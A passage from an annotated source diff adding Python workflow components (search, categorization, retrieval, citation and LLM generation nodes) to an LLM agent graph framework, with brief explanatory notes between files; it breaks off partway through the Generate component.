def component_class(class_name):
    m = importlib.import_module("graph.component")
    c = getattr(m, class_name)
    return c
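
A small sketch of how this factory is used (for example, by `Canvas.load`); the names resolved here are among those imported above:

```python
from graph.component import component_class

# Resolve classes by name at runtime, as Canvas.load does.
param = component_class("AnswerParam")()  # build the parameter object
param.check()                             # validate its defaults
answer_cls = component_class("Answer")    # the matching component class
```
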
graph/component/answer.py (new file, 77 lines)
@ -0,0 +1,77 @@
#
#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#
import random
from abc import ABC
from functools import partial

import pandas as pd

from graph.component.base import ComponentBase, ComponentParamBase


class AnswerParam(ComponentParamBase):

    """
    Define the Answer component parameters.
    """
    def __init__(self):
        super().__init__()
        self.post_answers = []

    def check(self):
        return True


class Answer(ComponentBase, ABC):
    component_name = "Answer"

    def _run(self, history, **kwargs):
        if kwargs.get("stream"):
            return partial(self.stream_output)

        ans = self.get_input()
        if self._param.post_answers:
            ans = pd.concat([ans, pd.DataFrame([{"content": random.choice(self._param.post_answers)}])], ignore_index=False)
        return ans

    def stream_output(self):
        res = None
        if hasattr(self, "exception") and self.exception:
            res = {"content": str(self.exception)}
            self.exception = None
            yield res
            self.set_output(res)
            return

        stream = self.get_stream_input()
        if isinstance(stream, pd.DataFrame):
            res = stream
            for ii, row in stream.iterrows():
                yield row.to_dict()
        else:
            for st in stream():
                res = st
                yield st
        if self._param.post_answers:
            res["content"] += random.choice(self._param.post_answers)
            yield res

        self.set_output(res)

    def set_exception(self, e):
        self.exception = e
graph/component/baidu.py (new file, 62 lines)
@ -0,0 +1,62 @@
#
#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#
import random
from abc import ABC
from functools import partial
import pandas as pd
import requests
import re

from graph.component.base import ComponentBase, ComponentParamBase


class BaiduParam(ComponentParamBase):
    """
    Define the Baidu component parameters.
    """

    def __init__(self):
        super().__init__()
        self.top_n = 10

    def check(self):
        self.check_positive_integer(self.top_n, "Top N")


class Baidu(ComponentBase, ABC):
    component_name = "Baidu"

    def _run(self, history, **kwargs):
        ans = self.get_input()
        ans = " - ".join(ans["content"]) if "content" in ans else ""
        if not ans:
            return Baidu.be_output(self._param.no)

        url = 'https://www.baidu.com/s?wd=' + ans + '&rn=' + str(self._param.top_n)
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36'}
        response = requests.get(url=url, headers=headers)

        url_res = re.findall(r"'url': \\\"(.*?)\\\"}", response.text)
        title_res = re.findall(r"'title': \\\"(.*?)\\\",\\n", response.text)
        body_res = re.findall(r"\"contentText\":\"(.*?)\"", response.text)
        baidu_res = [re.sub('<em>|</em>', '', '<a href="' + url + '">' + title + '</a> ' + body) for url, title, body
                     in zip(url_res, title_res, body_res)]
        del body_res, url_res, title_res

        br = pd.DataFrame(baidu_res, columns=['content'])
        print(">>>>>>>>>>>>>>>>>>>>>>>>>>\n", br)
        return br
graph/component/base.py (new file, 480 lines)
@ -0,0 +1,480 @@
#
#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#
from abc import ABC
import builtins
import json
import os
from copy import deepcopy
from functools import partial
from typing import List, Dict, Tuple, Union

import pandas as pd

from graph import settings
from graph.settings import flow_logger, DEBUG

_FEEDED_DEPRECATED_PARAMS = "_feeded_deprecated_params"
_DEPRECATED_PARAMS = "_deprecated_params"
_USER_FEEDED_PARAMS = "_user_feeded_params"
_IS_RAW_CONF = "_is_raw_conf"


class ComponentParamBase(ABC):
    def __init__(self):
        self.output_var_name = "output"
        self.message_history_window_size = 4

    def set_name(self, name: str):
        self._name = name
        return self

    def check(self):
        raise NotImplementedError("Parameter Object should be checked.")

    @classmethod
    def _get_or_init_deprecated_params_set(cls):
        if not hasattr(cls, _DEPRECATED_PARAMS):
            setattr(cls, _DEPRECATED_PARAMS, set())
        return getattr(cls, _DEPRECATED_PARAMS)

    def _get_or_init_feeded_deprecated_params_set(self, conf=None):
        if not hasattr(self, _FEEDED_DEPRECATED_PARAMS):
            if conf is None:
                setattr(self, _FEEDED_DEPRECATED_PARAMS, set())
            else:
                setattr(
                    self,
                    _FEEDED_DEPRECATED_PARAMS,
                    set(conf[_FEEDED_DEPRECATED_PARAMS]),
                )
        return getattr(self, _FEEDED_DEPRECATED_PARAMS)

    def _get_or_init_user_feeded_params_set(self, conf=None):
        if not hasattr(self, _USER_FEEDED_PARAMS):
            if conf is None:
                setattr(self, _USER_FEEDED_PARAMS, set())
            else:
                setattr(self, _USER_FEEDED_PARAMS, set(conf[_USER_FEEDED_PARAMS]))
        return getattr(self, _USER_FEEDED_PARAMS)

    def get_user_feeded(self):
        return self._get_or_init_user_feeded_params_set()

    def get_feeded_deprecated_params(self):
        return self._get_or_init_feeded_deprecated_params_set()

    @property
    def _deprecated_params_set(self):
        return {name: True for name in self.get_feeded_deprecated_params()}

    def __str__(self):
        return json.dumps(self.as_dict(), ensure_ascii=False)

    def as_dict(self):
        def _recursive_convert_obj_to_dict(obj):
            ret_dict = {}
            for attr_name in list(obj.__dict__):
                if attr_name in [_FEEDED_DEPRECATED_PARAMS, _DEPRECATED_PARAMS, _USER_FEEDED_PARAMS, _IS_RAW_CONF]:
                    continue
                # get attr
                attr = getattr(obj, attr_name)
                if isinstance(attr, pd.DataFrame):
                    ret_dict[attr_name] = attr.to_dict()
                    continue
                if attr and type(attr).__name__ not in dir(builtins):
                    ret_dict[attr_name] = _recursive_convert_obj_to_dict(attr)
                else:
                    ret_dict[attr_name] = attr

            return ret_dict

        return _recursive_convert_obj_to_dict(self)

    def update(self, conf, allow_redundant=False):
        update_from_raw_conf = conf.get(_IS_RAW_CONF, True)
        if update_from_raw_conf:
            deprecated_params_set = self._get_or_init_deprecated_params_set()
            feeded_deprecated_params_set = (
                self._get_or_init_feeded_deprecated_params_set()
            )
            user_feeded_params_set = self._get_or_init_user_feeded_params_set()
            setattr(self, _IS_RAW_CONF, False)
        else:
            feeded_deprecated_params_set = (
                self._get_or_init_feeded_deprecated_params_set(conf)
            )
            user_feeded_params_set = self._get_or_init_user_feeded_params_set(conf)

        def _recursive_update_param(param, config, depth, prefix):
            if depth > settings.PARAM_MAXDEPTH:
                raise ValueError("Param define nesting too deep!!!, can not parse it")

            inst_variables = param.__dict__
            redundant_attrs = []
            for config_key, config_value in config.items():
                # redundant attr
                if config_key not in inst_variables:
                    if not update_from_raw_conf and config_key.startswith("_"):
                        setattr(param, config_key, config_value)
                    else:
                        setattr(param, config_key, config_value)
                        # redundant_attrs.append(config_key)
                    continue

                full_config_key = f"{prefix}{config_key}"

                if update_from_raw_conf:
                    # add user feeded params
                    user_feeded_params_set.add(full_config_key)

                    # update user feeded deprecated param set
                    if full_config_key in deprecated_params_set:
                        feeded_deprecated_params_set.add(full_config_key)

                # supported attr
                attr = getattr(param, config_key)
                if type(attr).__name__ in dir(builtins) or attr is None:
                    setattr(param, config_key, config_value)

                else:
                    # recursive set obj attr
                    sub_params = _recursive_update_param(
                        attr, config_value, depth + 1, prefix=f"{prefix}{config_key}."
                    )
                    setattr(param, config_key, sub_params)

            if not allow_redundant and redundant_attrs:
                raise ValueError(
                    f"cpn `{getattr(self, '_name', type(self))}` has redundant parameters: `{[redundant_attrs]}`"
                )

            return param

        return _recursive_update_param(param=self, config=conf, depth=0, prefix="")

    def extract_not_builtin(self):
        def _get_not_builtin_types(obj):
            ret_dict = {}
            for variable in obj.__dict__:
                attr = getattr(obj, variable)
                if attr and type(attr).__name__ not in dir(builtins):
                    ret_dict[variable] = _get_not_builtin_types(attr)

            return ret_dict

        return _get_not_builtin_types(self)

    def validate(self):
        self.builtin_types = dir(builtins)
        self.func = {
            "ge": self._greater_equal_than,
            "le": self._less_equal_than,
            "in": self._in,
            "not_in": self._not_in,
            "range": self._range,
        }
        home_dir = os.path.abspath(os.path.dirname(os.path.realpath(__file__)))
        param_validation_path_prefix = home_dir + "/param_validation/"

        param_name = type(self).__name__
        param_validation_path = "/".join(
            [param_validation_path_prefix, param_name + ".json"]
        )

        validation_json = None

        try:
            with open(param_validation_path, "r") as fin:
                validation_json = json.loads(fin.read())
        except BaseException:
            return

        self._validate_param(self, validation_json)

    def _validate_param(self, param_obj, validation_json):
        default_section = type(param_obj).__name__
        var_list = param_obj.__dict__

        for variable in var_list:
            attr = getattr(param_obj, variable)

            if type(attr).__name__ in self.builtin_types or attr is None:
                if variable not in validation_json:
                    continue

                validation_dict = validation_json[default_section][variable]
                value = getattr(param_obj, variable)
                value_legal = False

                for op_type in validation_dict:
                    if self.func[op_type](value, validation_dict[op_type]):
                        value_legal = True
                        break

                if not value_legal:
                    raise ValueError(
                        "Please check runtime conf, {} = {} does not match user-parameter restriction".format(
                            variable, value
                        )
                    )

            elif variable in validation_json:
                self._validate_param(attr, validation_json)

    @staticmethod
    def check_string(param, descr):
        if type(param).__name__ not in ["str"]:
            raise ValueError(
                descr + " {} not supported, should be string type".format(param)
            )

    @staticmethod
    def check_empty(param, descr):
        if not param:
            raise ValueError(
                descr + " does not support empty value."
            )

    @staticmethod
    def check_positive_integer(param, descr):
        if type(param).__name__ not in ["int", "long"] or param <= 0:
            raise ValueError(
                descr + " {} not supported, should be positive integer".format(param)
            )

    @staticmethod
    def check_positive_number(param, descr):
        if type(param).__name__ not in ["float", "int", "long"] or param <= 0:
            raise ValueError(
                descr + " {} not supported, should be positive numeric".format(param)
            )

    @staticmethod
    def check_nonnegative_number(param, descr):
        if type(param).__name__ not in ["float", "int", "long"] or param < 0:
            raise ValueError(
                descr
                + " {} not supported, should be non-negative numeric".format(param)
            )

    @staticmethod
    def check_decimal_float(param, descr):
        if type(param).__name__ not in ["float", "int"] or param < 0 or param > 1:
            raise ValueError(
                descr
                + " {} not supported, should be a float number in range [0, 1]".format(
                    param
                )
            )

    @staticmethod
    def check_boolean(param, descr):
        if type(param).__name__ != "bool":
            raise ValueError(
                descr + " {} not supported, should be bool type".format(param)
            )

    @staticmethod
    def check_open_unit_interval(param, descr):
        if type(param).__name__ not in ["float"] or param <= 0 or param >= 1:
            raise ValueError(
                descr + " should be a numeric number between 0 and 1 exclusively"
            )

    @staticmethod
    def check_valid_value(param, descr, valid_values):
        if param not in valid_values:
            raise ValueError(
                descr
                + " {} is not supported, it should be in {}".format(param, valid_values)
            )

    @staticmethod
    def check_defined_type(param, descr, types):
        if type(param).__name__ not in types:
            raise ValueError(
                descr + " {} not supported, should be one of {}".format(param, types)
            )

    @staticmethod
    def check_and_change_lower(param, valid_list, descr=""):
        if type(param).__name__ != "str":
            raise ValueError(
                descr
                + " {} not supported, should be one of {}".format(param, valid_list)
            )

        lower_param = param.lower()
        if lower_param in valid_list:
            return lower_param
        else:
            raise ValueError(
                descr
                + " {} not supported, should be one of {}".format(param, valid_list)
            )

    @staticmethod
    def _greater_equal_than(value, limit):
        return value >= limit - settings.FLOAT_ZERO

    @staticmethod
    def _less_equal_than(value, limit):
        return value <= limit + settings.FLOAT_ZERO

    @staticmethod
    def _range(value, ranges):
        in_range = False
        for left_limit, right_limit in ranges:
            if (
                    left_limit - settings.FLOAT_ZERO
                    <= value
                    <= right_limit + settings.FLOAT_ZERO
            ):
                in_range = True
                break

        return in_range

    @staticmethod
    def _in(value, right_value_list):
        return value in right_value_list

    @staticmethod
    def _not_in(value, wrong_value_list):
        return value not in wrong_value_list

    def _warn_deprecated_param(self, param_name, descr):
        if self._deprecated_params_set.get(param_name):
            flow_logger.warning(
                f"{descr} {param_name} is deprecated and ignored in this version."
            )

    def _warn_to_deprecate_param(self, param_name, descr, new_param):
        if self._deprecated_params_set.get(param_name):
            flow_logger.warning(
                f"{descr} {param_name} will be deprecated in future release; "
                f"please use {new_param} instead."
            )
            return True
        return False


class ComponentBase(ABC):
    component_name: str

    def __str__(self):
        """
        {
            "component_name": "Begin",
            "params": {}
        }
        """
        return """{{
            "component_name": "{}",
            "params": {}
        }}""".format(self.component_name,
                     self._param
                     )

    def __init__(self, canvas, id, param: ComponentParamBase):
        self._canvas = canvas
        self._id = id
        self._param = param
        self._param.check()

    def run(self, history, **kwargs):
        flow_logger.info("{}, history: {}, kwargs: {}".format(self, json.dumps(history, ensure_ascii=False),
                                                              json.dumps(kwargs, ensure_ascii=False)))
        try:
            res = self._run(history, **kwargs)
            self.set_output(res)
        except Exception as e:
            self.set_output(pd.DataFrame([{"content": str(e)}]))
            raise e

        return res

    def _run(self, history, **kwargs):
        raise NotImplementedError()

    def output(self, allow_partial=True) -> Tuple[str, Union[pd.DataFrame, partial]]:
        o = getattr(self._param, self._param.output_var_name)
        if not isinstance(o, partial) and not isinstance(o, pd.DataFrame):
            if not isinstance(o, list): o = [o]
            o = pd.DataFrame(o)

        if allow_partial or not isinstance(o, partial):
            if not isinstance(o, partial) and not isinstance(o, pd.DataFrame):
                return pd.DataFrame(o if isinstance(o, list) else [o])
            return self._param.output_var_name, o

        outs = None
        for oo in o():
            if not isinstance(oo, pd.DataFrame):
                outs = pd.DataFrame(oo if isinstance(oo, list) else [oo])
            else: outs = oo
        return self._param.output_var_name, outs

    def reset(self):
        setattr(self._param, self._param.output_var_name, None)

    def set_output(self, v: pd.DataFrame):
        setattr(self._param, self._param.output_var_name, v)

    def get_input(self):
        upstream_outs = []
        reversed_cpnts = []
        if len(self._canvas.path) > 1:
            reversed_cpnts.extend(self._canvas.path[-2])
        reversed_cpnts.extend(self._canvas.path[-1])

        if DEBUG: print(self.component_name, reversed_cpnts[::-1])
        for u in reversed_cpnts[::-1]:
            if self.get_component_name(u) in ["switch"]: continue
            if self.component_name.lower().find("switch") < 0 \
                    and self.get_component_name(u) in ["relevant", "categorize"]:
                continue
            if u.lower().find("answer") >= 0:
                for r, c in self._canvas.history[::-1]:
                    if r == "user":
                        upstream_outs.append(pd.DataFrame([{"content": c}]))
                        break
                break
            if self.component_name.lower().find("answer") >= 0:
                if self.get_component_name(u) in ["relevant"]: continue

            else: upstream_outs.append(self._canvas.get_component(u)["obj"].output(allow_partial=False)[1])
|
||||
break
|
||||
|
||||
return pd.concat(upstream_outs, ignore_index=False)
|
||||
|
||||
def get_stream_input(self):
|
||||
reversed_cpnts = []
|
||||
if len(self._canvas.path) > 1:
|
||||
reversed_cpnts.extend(self._canvas.path[-2])
|
||||
reversed_cpnts.extend(self._canvas.path[-1])
|
||||
|
||||
for u in reversed_cpnts[::-1]:
|
||||
if self.get_component_name(u) in ["switch", "answer"]: continue
|
||||
return self._canvas.get_component(u)["obj"].output()[1]
|
||||
|
||||
@staticmethod
|
||||
def be_output(v):
|
||||
return pd.DataFrame([{"content": v}])
|
||||
|
||||
def get_component_name(self, cpn_id):
|
||||
return self._canvas.get_component(cpn_id)["obj"].component_name.lower()
|
||||
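Taken together, ComponentParamBase and ComponentBase define the contract every node in the graph follows: a param class that validates itself in check(), and a component class that implements _run() and returns a pandas DataFrame (or a partial for streaming). A minimal sketch of a custom component against that contract -- the Echo component, its param class, and the already-constructed canvas are hypothetical, not part of this diff:

    from graph.component.base import ComponentBase, ComponentParamBase


    class EchoParam(ComponentParamBase):
        """Hypothetical param class: one validated string field."""
        def __init__(self):
            super().__init__()
            self.suffix = "!"

        def check(self):
            self.check_string(self.suffix, "[Echo] Suffix")


    class Echo(ComponentBase):
        component_name = "Echo"

        def _run(self, history, **kwargs):
            # get_input() concatenates upstream outputs; be_output() wraps a
            # string into the single-column DataFrame the canvas expects.
            df = self.get_input()
            text = "; ".join(df["content"]) if "content" in df else ""
            return Echo.be_output(text + self._param.suffix)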
graph/component/begin.py (Normal file, +49 lines)
@@ -0,0 +1,49 @@
#
#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#
from functools import partial

import pandas as pd

from graph.component.base import ComponentBase, ComponentParamBase


class BeginParam(ComponentParamBase):
    """
    Define the Begin component parameters.
    """
    def __init__(self):
        super().__init__()
        self.prologue = "Hi! I'm your smart assistant. What can I do for you?"

    def check(self):
        return True


class Begin(ComponentBase):
    component_name = "Begin"

    def _run(self, history, **kwargs):
        if kwargs.get("stream"):
            return partial(self.stream_output)
        return pd.DataFrame([{"content": self._param.prologue}])

    def stream_output(self):
        res = {"content": self._param.prologue}
        yield res
        self.set_output(res)
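Begin illustrates the streaming convention used throughout the graph: when kwargs carries stream=True, _run returns a functools.partial instead of a DataFrame, and the caller drains it as a generator. A minimal sketch of how such an output might be consumed (the begin variable stands for a hypothetical, already-constructed component):

    from functools import partial

    out = begin._run([], stream=True)
    if isinstance(out, partial):
        for chunk in out():              # each chunk is {"content": ...}
            print(chunk["content"])
    else:
        print(out.iloc[0]["content"])    # non-streaming: a one-row DataFrame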
graph/component/categorize.py (Normal file, +90 lines)
@@ -0,0 +1,90 @@
#
#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#
from abc import ABC

from api.db import LLMType
from api.db.services.llm_service import LLMBundle
from graph.component import GenerateParam, Generate
from graph.settings import DEBUG


class CategorizeParam(GenerateParam):
    """
    Define the Categorize component parameters.
    """
    def __init__(self):
        super().__init__()
        self.category_description = {}
        self.prompt = ""

    def check(self):
        super().check()
        self.check_empty(self.category_description, "[Categorize] Category examples")
        for k, v in self.category_description.items():
            if not k:
                raise ValueError("[Categorize] Category name can not be empty!")
            if not v.get("to"):
                raise ValueError(f"[Categorize] 'To' of category {k} can not be empty!")

    def get_prompt(self):
        cate_lines = []
        for c, desc in self.category_description.items():
            for line in desc.get("examples", "").split("\n"):
                if not line:
                    continue
                cate_lines.append("Question: {}\tCategory: {}".format(line, c))

        descriptions = []
        for c, desc in self.category_description.items():
            if desc.get("description"):
                descriptions.append(
                    "--------------------\nCategory: {}\nDescription: {}\n".format(c, desc["description"]))

        self.prompt = """
        You're a text classifier. You need to categorize the user's questions into {} categories,
        namely: {}
        Here's the description of each category:
        {}

        You could learn from the following examples:
        {}
        Just mention the category names, no need for any additional words.
        """.format(
            len(self.category_description.keys()),
            "/".join(list(self.category_description.keys())),
            "\n".join(descriptions),
            "- ".join(cate_lines)
        )
        return self.prompt


class Categorize(Generate, ABC):
    component_name = "Categorize"

    def _run(self, history, **kwargs):
        input = self.get_input()
        input = "Question: " + ("; ".join(input["content"]) if "content" in input else "") + "Category: "
        chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT, self._param.llm_id)
        ans = chat_mdl.chat(self._param.get_prompt(), [{"role": "user", "content": input}],
                            self._param.gen_conf())
        if DEBUG:
            print(ans, ":::::::::::::::::::::::::::::::::", input)
        for c in self._param.category_description.keys():
            if ans.lower().find(c.lower()) >= 0:
                return Categorize.be_output(self._param.category_description[c]["to"])

        # Fall back to the last category's route when the model names none of them.
        return Categorize.be_output(list(self._param.category_description.items())[-1][1]["to"])
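The category_description dict drives both prompt construction and routing: each key is a category name, and its value carries a description, newline-separated examples, and a "to" target naming the downstream component (which check() requires). A sketch of the expected shape, with illustrative component IDs:

    category_description = {
        "product_related": {
            "description": "The question is about the product itself.",
            "examples": "How to install it?\nWhy does it leak?",
            "to": "retrieval:0",      # route here when this category matches
        },
        "casual": {
            "description": "Small talk unrelated to the product.",
            "examples": "How are you?\nWhat's your name?",
            "to": "generate:casual",
        },
    }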
graph/component/cite.py (Normal file, +75 lines)
@@ -0,0 +1,75 @@
#
#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#
from abc import ABC

import pandas as pd

from api.db import LLMType
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.services.llm_service import LLMBundle
from api.settings import retrievaler
from graph.component.base import ComponentBase, ComponentParamBase


class CiteParam(ComponentParamBase):
    """
    Define the Cite component parameters.
    """
    def __init__(self):
        super().__init__()
        self.cite_sources = []

    def check(self):
        self.check_empty(self.cite_sources, "Please specify where you want to cite from.")


class Cite(ComponentBase, ABC):
    component_name = "Cite"

    def _run(self, history, **kwargs):
        input = "\n- ".join(self.get_input()["content"])
        sources = [self._canvas.get_component(cpn_id).output()[1] for cpn_id in self._param.cite_sources]
        query = []
        for role, cnt in history[::-1][:self._param.message_history_window_size]:
            if role != "user":
                continue
            query.append(cnt)
        query = "\n".join(query)

        kbs = KnowledgebaseService.get_by_ids(self._param.kb_ids)
        if not kbs:
            raise ValueError("Can't find knowledgebases by {}".format(self._param.kb_ids))
        embd_nms = list(set([kb.embd_id for kb in kbs]))
        assert len(embd_nms) == 1, "Knowledge bases use different embedding models."

        embd_mdl = LLMBundle(kbs[0].tenant_id, LLMType.EMBEDDING, embd_nms[0])

        rerank_mdl = None
        if self._param.rerank_id:
            rerank_mdl = LLMBundle(kbs[0].tenant_id, LLMType.RERANK, self._param.rerank_id)

        kbinfos = retrievaler.retrieval(query, embd_mdl, kbs[0].tenant_id, self._param.kb_ids,
                                        1, self._param.top_n,
                                        self._param.similarity_threshold, 1 - self._param.keywords_similarity_weight,
                                        aggs=False, rerank_mdl=rerank_mdl)

        if not kbinfos["chunks"]:
            return pd.DataFrame()
        df = pd.DataFrame(kbinfos["chunks"])
        df["content"] = df["content_with_weight"]
        del df["content_with_weight"]
        return df
graph/component/duckduckgosearch.py (Normal file, +62 lines)
@@ -0,0 +1,62 @@
#
#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#
from abc import ABC

import pandas as pd
from duckduckgo_search import DDGS

from graph.component.base import ComponentBase, ComponentParamBase


class DuckDuckGoSearchParam(ComponentParamBase):
    """
    Define the DuckDuckGoSearch component parameters.
    """

    def __init__(self):
        super().__init__()
        self.top_n = 10
        self.channel = "text"

    def check(self):
        self.check_positive_integer(self.top_n, "Top N")
        self.check_valid_value(self.channel, "Web Search or News", ["text", "news"])


class DuckDuckGoSearch(ComponentBase, ABC):
    component_name = "DuckDuckGoSearch"

    def _run(self, history, **kwargs):
        ans = self.get_input()
        ans = " - ".join(ans["content"]) if "content" in ans else ""
        if not ans:
            return DuckDuckGoSearch.be_output("")

        if self._param.channel == "text":
            with DDGS() as ddgs:
                # {'title': '', 'href': '', 'body': ''}
                duck_res = ['<a href="' + i["href"] + '">' + i["title"] + '</a> ' + i["body"] for i in
                            ddgs.text(ans, max_results=self._param.top_n)]
        elif self._param.channel == "news":
            with DDGS() as ddgs:
                # {'date': '', 'title': '', 'body': '', 'url': '', 'image': '', 'source': ''}
                duck_res = ['<a href="' + i["url"] + '">' + i["title"] + '</a> ' + i["body"] for i in
                            ddgs.news(ans, max_results=self._param.top_n)]

        dr = pd.DataFrame(duck_res, columns=['content'])
        print(">>>>>>>>>>>>>>>>>>>>>>>>>>\n", dr)
        return dr
graph/component/generate.py (Normal file, +164 lines)
@@ -0,0 +1,164 @@
#
#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#
import re
from functools import partial

import pandas as pd

from api.db import LLMType
from api.db.services.llm_service import LLMBundle
from api.settings import retrievaler
from graph.component.base import ComponentBase, ComponentParamBase


class GenerateParam(ComponentParamBase):
    """
    Define the Generate component parameters.
    """

    def __init__(self):
        super().__init__()
        self.llm_id = ""
        self.prompt = ""
        self.max_tokens = 0
        self.temperature = 0
        self.top_p = 0
        self.presence_penalty = 0
        self.frequency_penalty = 0
        self.cite = True
        self.parameters = []

    def check(self):
        self.check_decimal_float(self.temperature, "[Generate] Temperature")
        self.check_decimal_float(self.presence_penalty, "[Generate] Presence penalty")
        self.check_decimal_float(self.frequency_penalty, "[Generate] Frequency penalty")
        self.check_nonnegative_number(self.max_tokens, "[Generate] Max tokens")
        self.check_decimal_float(self.top_p, "[Generate] Top P")
        self.check_empty(self.llm_id, "[Generate] LLM")
        # self.check_defined_type(self.parameters, "Parameters", ["list"])

    def gen_conf(self):
        conf = {}
        if self.max_tokens > 0:
            conf["max_tokens"] = self.max_tokens
        if self.temperature > 0:
            conf["temperature"] = self.temperature
        if self.top_p > 0:
            conf["top_p"] = self.top_p
        if self.presence_penalty > 0:
            conf["presence_penalty"] = self.presence_penalty
        if self.frequency_penalty > 0:
            conf["frequency_penalty"] = self.frequency_penalty
        return conf


class Generate(ComponentBase):
    component_name = "Generate"

    def _run(self, history, **kwargs):
        chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT, self._param.llm_id)
        prompt = self._param.prompt

        retrieval_res = self.get_input()
        input = "\n- ".join(retrieval_res["content"])
        for para in self._param.parameters:
            cpn = self._canvas.get_component(para["component_id"])["obj"]
            _, out = cpn.output(allow_partial=False)
            if "content" not in out.columns:
                kwargs[para["key"]] = "Nothing"
            else:
                kwargs[para["key"]] = "\n - ".join(out["content"])

        kwargs["input"] = input
        for n, v in kwargs.items():
            # prompt = re.sub(r"\{%s\}" % n, re.escape(str(v)), prompt)
            prompt = re.sub(r"\{%s\}" % n, str(v), prompt)

        if kwargs.get("stream"):
            return partial(self.stream_output, chat_mdl, prompt, retrieval_res)

        if "empty_response" in retrieval_res.columns:
            return Generate.be_output(input)

        ans = chat_mdl.chat(prompt, self._canvas.get_history(self._param.message_history_window_size),
                            self._param.gen_conf())

        if self._param.cite and "content_ltks" in retrieval_res.columns and "vector" in retrieval_res.columns:
            ans, idx = retrievaler.insert_citations(ans,
                                                    [ck["content_ltks"] for _, ck in retrieval_res.iterrows()],
                                                    [ck["vector"] for _, ck in retrieval_res.iterrows()],
                                                    LLMBundle(self._canvas.get_tenant_id(), LLMType.EMBEDDING,
                                                              self._canvas.get_embedding_model()),
                                                    tkweight=0.7,
                                                    vtweight=0.3)
            del retrieval_res["vector"]
            retrieval_res = retrieval_res.to_dict("records")
            df = []
            for i in idx:
                df.append(retrieval_res[int(i)])
                r = re.search(r"^((.|[\r\n])*? ##%s\$\$)" % str(i), ans)
                assert r, f"{i} => {ans}"
                df[-1]["content"] = r.group(1)
                ans = re.sub(r"^((.|[\r\n])*? ##%s\$\$)" % str(i), "", ans)
            if ans:
                df.append({"content": ans})
            return pd.DataFrame(df)

        return Generate.be_output(ans)

    def stream_output(self, chat_mdl, prompt, retrieval_res):
        res = None
        if "empty_response" in retrieval_res.columns and "\n- ".join(retrieval_res["content"]):
            res = {"content": "\n- ".join(retrieval_res["content"]), "reference": []}
            yield res
            self.set_output(res)
            return

        answer = ""
        for ans in chat_mdl.chat_streamly(prompt, self._canvas.get_history(self._param.message_history_window_size),
                                          self._param.gen_conf()):
            res = {"content": ans, "reference": []}
            answer = ans
            yield res

        if self._param.cite and "content_ltks" in retrieval_res.columns and "vector" in retrieval_res.columns:
            answer, idx = retrievaler.insert_citations(answer,
                                                       [ck["content_ltks"] for _, ck in retrieval_res.iterrows()],
                                                       [ck["vector"] for _, ck in retrieval_res.iterrows()],
